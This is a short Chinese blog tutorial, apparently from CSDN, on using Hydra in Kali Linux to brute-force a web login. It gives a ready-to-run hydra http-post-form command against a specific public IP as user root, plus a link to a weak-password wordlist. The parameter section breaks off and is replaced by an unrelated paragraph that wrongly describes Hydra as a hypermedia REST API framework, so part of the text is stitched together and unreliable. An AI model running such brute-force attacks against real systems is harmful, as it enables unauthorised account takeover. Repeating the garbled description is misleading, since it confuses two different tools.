kali下hydra的使用

一、hydra位置

二、使用

1、 将密码存在文档中,或从GitHub中获取https://github.com/TgeaUs/Weak-password

2、查看页面请求方式,可参考https://blog.csdn.net/weixin_43039349/article/details/89323846

思路:用hydra向ip58.155.106.35发送POST验证请求,把password字段换成字典中的一条,根据服务端的回复验证密码是否正确。然后循环验证字典中的密码

hydra -t 1 -l root -P cyzidian.txt -o out.txt -vV -f 58.155.106.35 http-post-form "/:username=^USER^&password=^PASS^:error"

3、提高爆破速度:采用多线程python爆破,暂未尝试~

三、参数说明 

参考其他文章:

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] |

Hydra 数据字典是一个记录和描述 Hydra 框架下数据实体、属性和关系的集合。Hydra 是一种开源的超媒体驱动的 Web API 框架,用于构建和管理 RESTful API,并与 Linked Data 兼容。 在 Hydra 数据字典中,我们可以找到关于 Hydra API 中的每个数据实体的详细信息。数据实体通常代表领域模型中的实际对象,例如用户、产品、订单等。每个数据实体都有一套属性,描述了该实体的特征和状态。 属性是数据实体中的各个方面的特征,例如用户实体的属性可以包括姓名、年龄、电子邮件等。每个属性都有一个数据类型和一组约束条件,用于规范属性的取值范围和格式。 在 Hydra 数据字典中,还可以定义数据实体之间的关系。关系描述了不同实体之间的链接和依赖关系。例如,一个订单实体可能与一个用户实体相关联,此时可以定义一个关系表示订单和用户之间的关联。 通过 Hydra 数据字典,开发者可以查看和了解 API 中所有可用的数据实体、属性和关系。这使得开发者能够根据需要构建和管理与 API 相关的数据。此外,Hydra 数据字典还可以用于生成 API 文档,帮助其他开发者快速了解和使用 API。 总而言之,Hydra 数据字典是一个记录 Hydra 框架下 API 数据实体、属性和关系的集合。它提供了一种规范和方便的方式,帮助开发者了解和使用 Hydra API,促进了 API 的开发和管理过程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值